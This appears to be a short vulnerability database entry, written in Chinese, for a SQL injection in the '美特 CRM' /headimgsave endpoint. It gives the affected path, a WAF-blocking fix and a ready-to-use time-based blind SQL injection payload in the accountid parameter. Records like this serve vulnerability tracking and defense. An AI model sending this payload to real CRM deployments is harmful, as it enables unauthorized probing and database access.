vendor = "美特"
name = "美特 CRM headimgsave SQL 注入漏洞"
type = "SQL注入"
version = "未知"
path = "/headimgsave"
detail = "/headimgsave?accountid=1'+AND+(SELECT+5+FROM+(SELECT+SLEEP(3))qaz)--+"
fix = "使用WAF封禁该地址"
date = "0705"
label = "nday"
verifier = "sxf"
